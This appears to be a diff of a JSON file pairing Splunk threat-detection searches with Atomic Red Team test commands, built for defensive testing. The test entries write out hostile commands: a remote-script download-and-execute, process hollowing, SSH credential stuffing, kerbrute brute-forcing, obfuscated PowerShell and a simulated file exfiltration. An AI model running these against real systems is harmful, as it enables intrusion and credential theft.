"name": null, + "name": "src_ip", "type": "IP Address", "role": [ "Attacker" @@ -518786,7 +524351,7 @@ { "name": "Suspicious Kerberos Service Ticket Request", "description": "As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will request and obtain a Kerberos Service Ticket (TGS) with a domain controller computer account as the Service Name. This Service Ticket can be then used to take control of the domain controller on the final part of the attack. This analytic leverages Event Id 4769, `A Kerberos service ticket was requested`, to identify an unusual TGS request where the Account_Name requesting the ticket matches the Service_Name field. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation.", - "search": " `wineventlog_security` EventCode=4769 | eval isSuspicious = if(lower(Service_Name) = lower(mvindex(split(Account_Name,\"@\"),0)+\"$\"),1,0) | where isSuspicious = 1 | table _time, Client_Address, Account_Name, Service_Name, Failure_Code, isSuspicious | `suspicious_kerberos_service_ticket_request_filter`", + "search": " `wineventlog_security` EventCode=4769 | eval isSuspicious = if(lower(Service_Name) = lower(mvindex(split(Account_Name,\"@\"),0)+\"$\"),1,0) | where isSuspicious = 1 | rename ComputerName as dest| rename Account_Name as user | table _time, dest, Client_Address, Account_Name, Service_Name, Failure_Code, isSuspicious | `suspicious_kerberos_service_ticket_request_filter`", "tags": { "name": "Suspicious Kerberos Service Ticket Request", "analytic_story": [ @@ -518803,7 +524368,7 @@ "Delivery", "Installation" ], - "message": "A suspicious Kerberos Service Ticket was requested by $Account_Name$", + "message": "A suspicious Kerberos Service Ticket was requested by $user$ on host $dest$", "mitre_attack_id": [ "T1078", "T1078.002" @@ -518813,7 +524378,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -522505,7 +528070,7 @@ } ], "command_list": [ - ". \\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process explorer | select -expand id\nStart-Hollow -Sponsor \"C:\\Windows\\System32\\notepad.exe\" -Hollow \"C:\\Windows\\System32\\cmd.exe\" -ParentPID $ppid -Verbose\n", + ". \"\\T1055.012\\src\\Start-Hollow.ps1\"\n$ppid=Get-Process explorer | select -expand id\nStart-Hollow -Sponsor \"C:\\Windows\\System32\\notepad.exe\" -Hollow \"C:\\Windows\\System32\\cmd.exe\" -ParentPID $ppid -Verbose\n", "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"Word\" -sub \"Exploit\"\n" ], "commands": [], @@ -522548,7 +528113,7 @@ } }, "executor": { - "command": ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + "command": ". \"$PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\"\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", "cleanup_command": "Stop-Process -Name \"#{spawnto_process_name}\" -ErrorAction Ignore\n", "name": "powershell" } @@ -523452,7 +529017,7 @@ { "name": "Linux pkexec Privilege Escalation", "description": "The following analytic identifies `pkexec` spawning with no command-line arguments. A vulnerability in Polkit's pkexec component identified as CVE-2021-4034 (PwnKit) which is present in the default configuration of all major Linux distributions and can be exploited to gain full root privileges on the system.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=pkexec by _time Processes.dest Processes.process_id Processes.parent_process_name Processes.process_name Processes.process Processes.process_path | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(^.{1}$)\" | `linux_pkexec_privilege_escalation_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=pkexec by _time Processes.dest Processes.user Processes.process_id Processes.parent_process_name Processes.process_name Processes.process Processes.process_path | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(^.{1}$)\" | `linux_pkexec_privilege_escalation_filter`", "tags": { "name": "Linux pkexec Privilege Escalation", "analytic_story": [ @@ -523677,7 +529242,7 @@ { "name": "Windows Driver Load Non-Standard Path", "description": "The following analytic uses Windows EventCode 7045 to identify new Kernel Mode Drivers being loaded in Windows from a non-standard path. Note that, adversaries may move malicious or vulnerable drivers into these paths and load up. The idea is that this analytic provides visibility into drivers loading in non-standard file paths.", - "search": "`wineventlog_system` EventCode=7045 ServiceType=\"kernel mode driver\" NOT (ImagePath IN (\"*\\\\Windows\\\\*\", \"*\\\\Program File*\", \"*\\\\systemroot\\\\*\",\"%SystemRoot%*\", \"system32\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_driver_load_non_standard_path_filter`", + "search": "`wineventlog_system` EventCode=7045 ServiceType=\"kernel mode driver\" NOT (ImagePath IN (\"*\\\\Windows\\\\*\", \"*\\\\Program File*\", \"*\\\\systemroot\\\\*\",\"%SystemRoot%*\", \"system32\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_driver_load_non_standard_path_filter`", "tags": { "name": "Windows Driver Load Non-Standard Path", "analytic_story": [ @@ -523693,7 +529258,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "A kernel mode driver was loaded from a non-standard path on $ComputerName$.", + "message": "A kernel mode driver was loaded from a non-standard path on $dest$.", "mitre_attack_id": [ "T1014", "T1068" @@ -523703,7 +529268,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -525433,9 +530998,9 @@ } ], "command_list": [ - "cp /T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", - "cp /T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", - "cd \\..\\ExternalPayloads\n.\\kerbrute.exe bruteforce --dc $ENV:userdnsdomain -d $ENV:userdomain \\..\\ExternalPayloads\\bruteforce.txt \n" + "cp \"/T1110.004/src/credstuffuserpass.txt\" /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", + "cp \"/T1110.004/src/credstuffuserpass.txt\" /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", + "cd \"\\..\\ExternalPayloads\"\n.\\kerbrute.exe bruteforce --dc $ENV:userdnsdomain -d $ENV:userdomain \"\\..\\ExternalPayloads\\bruteforce.txt\" \n" ], "commands": [], "queries": [], @@ -525472,7 +531037,7 @@ "executor": { "name": "bash", "elevation_required": false, - "command": "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" + "command": "cp \"$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt\" /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" } }, { @@ -525500,7 +531065,7 @@ "executor": { "name": "bash", "elevation_required": false, - "command": "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" + "command": "cp \"$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt\" /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" } }, { @@ -525526,19 +531091,19 @@ "dependencies": [ { "description": "kerbrute.exe must exist in PathToAtomicsFolder\\..\\ExternalPayloads\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe){exit 0} else {exit 1}\n", + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe\"){exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe\"\n" }, { "description": "bruteforce.txt must exist in PathToAtomicsFolder\\..\\ExternalPayloads\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\bruteforce.txt){exit 0} else {exit 1}\n", - "get_prereq_command": "invoke-webrequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\bruteforce.txt\"\n" + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\bruteforce.txt\"){exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\bruteforce.txt\"\n" } ], "executor": { "name": "powershell", "elevation_required": false, - "command": "cd PathToAtomicsFolder\\..\\ExternalPayloads\n.\\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} PathToAtomicsFolder\\..\\ExternalPayloads\\bruteforce.txt \n" + "command": "cd \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n.\\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} \"PathToAtomicsFolder\\..\\ExternalPayloads\\bruteforce.txt\" \n" } } ] @@ -526362,7 +531927,7 @@ { "name": "Azure AD Multiple Users Failing To Authenticate From Ip", "description": "The following analytic identifies one source Ip failing to authenticate with 30 unique valid users within 5 minutes. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password. This logic can be used for real time security monitoring as well as threat hunting exercises.\\\nAzure AD tenants can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold if needed.", - "search": " `azuread` body.category= SignInLogs body.properties.status.errorCode=50126 body.properties.authenticationDetails{}.succeeded= false | rename body.properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as tried_accounts by _time, ipAddress | where unique_accounts > 30 | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | where unique_accounts > 30 | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter`", "tags": { "name": "Azure AD Multiple Users Failing To Authenticate From Ip", "analytic_story": [ @@ -526376,7 +531941,7 @@ "Weaponization", "Exploitation" ], - "message": "Source Ip $body.properties.ipAddress$ failed to authenticate with 30 users within 5 minutes.", + "message": "Source Ip $ipAddress$ failed to authenticate with 30 users within 5 minutes.", "mitre_attack_id": [ "T1586", "T1586.003", @@ -526477,7 +532042,7 @@ { "name": "Azure AD Unusual Number of Failed Authentications From Ip", "description": "The following analytic identifies one source Ip failing to authenticate with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password.\\\nThe detection calculates the standard deviation for source Ip and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\\\nWhile looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `Azure AD Multiple Users Failing To Authenticate From Ip`.", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=50126 body.properties.authenticationDetails{}.succeeded= false | rename body.properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as tried_accounts by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg , stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1, 0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg, stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1,0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter`", "tags": { "name": "Azure AD Unusual Number of Failed Authentications From Ip", "analytic_story": [ @@ -526491,7 +532056,7 @@ "Weaponization", "Exploitation" ], - "message": "Possible Password Spraying attack against Azure AD from source ip $body.properties.ipAddress$", + "message": "Possible Password Spraying attack against Azure AD from source ip $ipAddress$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -527437,8 +533002,8 @@ "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand\n", "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name Debug -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug)))\"\n", "\"%temp%\\temp_T1027.zip\\T1027.exe\"\n", - "Send-MailMessage -From test@corp.com -To test@corp.com -Subject 'T1027_Atomic_Test' -Attachments \\T1027\\src\\T1027-cc-macro.xlsm -SmtpServer 127.0.0.1\n", - "Invoke-WebRequest -Uri 127.0.0.1 -Method POST -Body \\T1027\\src\\T1027-cc-macro.xlsm\n", + "Send-MailMessage -From test@corp.com -To test@corp.com -Subject 'T1027_Atomic_Test' -Attachments \"\\T1027\\src\\T1027-cc-macro.xlsm\" -SmtpServer 127.0.0.1\n", + "Invoke-WebRequest -Uri 127.0.0.1 -Method POST -Body \"\\T1027\\src\\T1027-cc-macro.xlsm\"\n", "$cmDwhy =[TyPe](\"{0}{1}\" -f 'S','TrING') ; $pz2Sb0 =[TYpE](\"{1}{0}{2}\"-f'nv','cO','ert') ; &(\"{0}{2}{3}{1}{4}\" -f'In','SiO','vOKe-EXp','ReS','n') ( (&(\"{1}{2}{0}\"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y')).\"v`ALUe\"::(\"{1}{0}\" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::\"t`OinT`16\"(( [sTring]${_}) ,8)))})) )\n", "$file = New-Item $env:windir\\registration\\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host \"File created: $($file.FullName)\"\n", "\"%temp%\\temp_T1027js.zip\\T1027js.js\"\n" @@ -527880,7 +533445,7 @@ "dependencies": [ { "description": "T1027.exe must exist on disk at PathToAtomicsFolder\\..\\ExternalPayloads\\temp_T1027.zip\\T1027.exe\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\temp_T1027.zip\\T1027.exe) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\temp_T1027.zip\\T1027.exe\") {exit 0} else {exit 1}\n", "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"#{url_path}\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\T1027.zip\"\nExpand-Archive -path \"PathToAtomicsFolder\\..\\ExternalPayloads\\T1027.zip\" -DestinationPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\temp_T1027.zip\\\" -Force\n" } ], @@ -527920,7 +533485,7 @@ } }, "executor": { - "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments \"#{input_file}\" -SmtpServer #{smtp_server}\n", "name": "powershell" } }, @@ -527944,7 +533509,7 @@ } }, "executor": { - "command": "Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}\n", + "command": "Invoke-WebRequest -Uri #{ip_address} -Method POST -Body \"#{input_file}\"\n", "name": "powershell" } }, @@ -528016,8 +533581,8 @@ "dependencies": [ { "description": "T1027.js must exist on disk at PathToAtomicsFolder\\..\\ExternalPayloads\\temp_T1027js.zip\\T1027js.js\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\temp_T1027js.zip\\T1027js.js) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"#{url_path}\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\T1027js.zip\"\nExpand-Archive -path \"PathToAtomicsFolder\\..\\ExternalPayloads\\T1027js.zip\" -DestinationPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\temp_T1027js.zip\\\" -Force\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\temp_T1027js.zip\\T1027js.js\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"#{url_path}\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\T1027js.zip\"\nExpand-Archive -path \"PathToAtomicsFolder\\..\\ExternalPayloads\\T1027js.zip\" -DestinationPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\temp_T1027js.zip\\\" -Force\n" } ], "executor": { @@ -529545,90 +535110,187 @@ "Windshift", "menuPass" ] - }, - { - "mitre_attack_id": "T1059.001", - "mitre_attack_technique": "PowerShell", - "mitre_attack_tactics": [ - "Execution" - ], - "mitre_attack_groups": [ - "APT19", - "APT28", - "APT29", - "APT3", - "APT32", - "APT33", - "APT38", - "APT39", - "APT41", - "Aquatic Panda", - "BRONZE BUTLER", - "Blue Mockingbird", - "Chimera", - "Cobalt Group", - "Confucius", - "CopyKittens", - "DarkHydrus", - "DarkVishnya", - "Deep Panda", - "Dragonfly", - "Earth Lusca", - "Ember Bear", - "FIN10", - "FIN6", - "FIN7", - "FIN8", - "Fox Kitten", - "GALLIUM", - "GOLD SOUTHFIELD", - "Gallmaker", - "Gamaredon Group", - "Gorgon Group", - "HAFNIUM", - "HEXANE", - "Inception", - "Indrik Spider", - "Kimsuky", - "Lazarus Group", - "LazyScripter", - "Leviathan", - "Magic Hound", - "Molerats", - "MuddyWater", - "Mustang Panda", - "Nomadic Octopus", - "OilRig", - "Patchwork", - "Poseidon Group", - "Sandworm Team", - "Sidewinder", - "Silence", - "Stealth Falcon", - "TA459", - "TA505", - "TEMP.Veles", - "TeamTNT", - "Threat Group-3390", - "Thrip", - "Tonto Team", - "Turla", - "WIRTE", - "Wizard Spider", - "menuPass" - ] + }, + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Wermgr Process Create Executable File", + "description": "this search is designed to detect potential malicious wermgr.exe process that drops or create executable file. Since wermgr.exe is an application trigger when error encountered in a process, it is really un ussual to this process to drop executable file. This technique is commonly seen in trickbot malware where it injects it code to this process to execute it malicious behavior like downloading other payload", + "search": "`sysmon` EventCode=11 process_name = \"wermgr.exe\" TargetFilename = \"*.exe\" | stats min(_time) as firstTime max(_time) as lastTime count by Image TargetFilename process_name dest EventCode ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_create_executable_file_filter`", + "tags": { + "name": "Wermgr Process Create Executable File", + "analytic_story": [ + "Trickbot" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Wermgr.exe writing executable files on $dest$", + "mitre_attack_id": [ + "T1027" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + } + ], + "risk_score": 56, + "security_domain": "endpoint", + "risk_severity": "medium", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1027", + "mitre_attack_technique": "Obfuscated Files or Information", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT19", + "APT28", + "APT3", + "APT32", + "APT33", + "APT37", + "APT39", + "APT41", + "BITTER", + "BackdoorDiplomacy", + "BlackOasis", + "Blue Mockingbird", + "Dark Caracal", + "Darkhotel", + "Earth Lusca", + "Elderwood", + "Ember Bear", + "Fox Kitten", + "GALLIUM", + "Gallmaker", + "Gamaredon Group", + "Group5", + "Higaisa", + "Inception", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "Leviathan", + "Magic Hound", + "Metador", + "Mofang", + "Molerats", + "Moses Staff", + "Mustang Panda", + "OilRig", + "Putter Panda", + "Rocke", + "Sandworm Team", + "Sidewinder", + "TA505", + "TeamTNT", + "Threat Group-3390", + "Transparent Tribe", + "Tropic Trooper", + "Whitefly", + "Windshift", + "menuPass" + ] } ] } }, { - "name": "Wermgr Process Create Executable File", - "description": "this search is designed to detect potential malicious wermgr.exe process that drops or create executable file. Since wermgr.exe is an application trigger when error encountered in a process, it is really un ussual to this process to drop executable file. This technique is commonly seen in trickbot malware where it injects it code to this process to execute it malicious behavior like downloading other payload", - "search": "`sysmon` EventCode=11 process_name = \"wermgr.exe\" TargetFilename = \"*.exe\" | stats min(_time) as firstTime max(_time) as lastTime count by Image TargetFilename process_name dest EventCode ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_create_executable_file_filter`", + "name": "Windows Registry Payload Injection", + "description": "The following analytic identifies when suspiciouly long data is written to the registry. This behavior is often associated with certain fileless malware threats or persistence techniques used by threat actors. Data stored in the registy is considered fileless since it does not get written to disk and is traditionally not well defended since normal users can modify thier own registry.", + "search": "| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid| `drop_dm_object_name(Processes)` | join max=0 dest process_guid [| tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry where Registry.registry_value_data=* by _time span=1h Registry.dest Registry.registry_path Registry.registry_value_name Registry.process_guid Registry.registry_value_data Registry.registry_key_name | `drop_dm_object_name(Registry)` | eval reg_data_len = len(registry_value_data) | where reg_data_len > 512] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data)| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `windows_registry_payload_injection_filter`", "tags": { - "name": "Wermgr Process Create Executable File", + "name": "Windows Registry Payload Injection", "analytic_story": [ - "Trickbot" + "Unusual Processes" ], "asset_type": "Endpoint", "cis20": [ @@ -529637,9 +535299,10 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Wermgr.exe writing executable files on $dest$", + "message": "The process $process_name$ added a suspicious length of registry data on $dest$.", "mitre_attack_id": [ - "T1027" + "T1027", + "T1027.011" ], "nist": [ "DE.CM" @@ -529651,9 +535314,30 @@ "role": [ "Victim" ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "process", + "type": "Process", + "role": [ + "Attacker" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Attacker" + ] } ], - "risk_score": 56, + "risk_score": 60, "security_domain": "endpoint", "risk_severity": "medium", "mitre_attack_enrichments": [ @@ -529714,6 +535398,17 @@ "Windshift", "menuPass" ] + }, + { + "mitre_attack_id": "T1027.011", + "mitre_attack_technique": "Fileless Storage", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT32", + "Turla" + ] } ] } @@ -530150,10 +535845,9 @@ "tags": { "name": "ASL AWS New MFA Method Registered For User", "analytic_story": [ - "Compromised User Account", - "Azure Active Directory Account Takeover" + "AWS Identity and Access Management Account Takeover" ], - "asset_type": "Azure Active Directory", + "asset_type": "AWS Account", "cis20": [ "CIS 10" ], @@ -530327,10 +536021,9 @@ "tags": { "name": "AWS New MFA Method Registered For User", "analytic_story": [ - "Compromised User Account", - "Azure Active Directory Account Takeover" + "AWS Identity and Access Management Account Takeover" ], - "asset_type": "Azure Active Directory", + "asset_type": "AWS Account", "cis20": [ "CIS 10" ], @@ -530338,7 +536031,7 @@ "Exploitation", "Installation" ], - "message": "A new virtual device $virtualMFADeviceName$ is added to user $user_arn$", + "message": "A new virtual device $virtualMFADeviceName$ is added to user $user_arn$", "mitre_attack_id": [ "T1556", "T1556.006" @@ -530348,7 +536041,7 @@ ], "observable": [ { - "name": "user_name", + "name": "user_arn", "type": "User", "role": [ "Victim" @@ -530392,7 +536085,7 @@ { "name": "Azure AD Multi-Factor Authentication Disabled", "description": "The following analytic identifies an attempt to disable multi-factor authentication for an Azure AD user. An adversary who has obtained access to an Azure AD tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users.", - "search": "`azuread` body.category=AuditLogs body.operationName=\"Disable Strong Authentication\" | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename targetResources{}.type as type | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) by _time, type, body.operationName, initiatedBy, result | 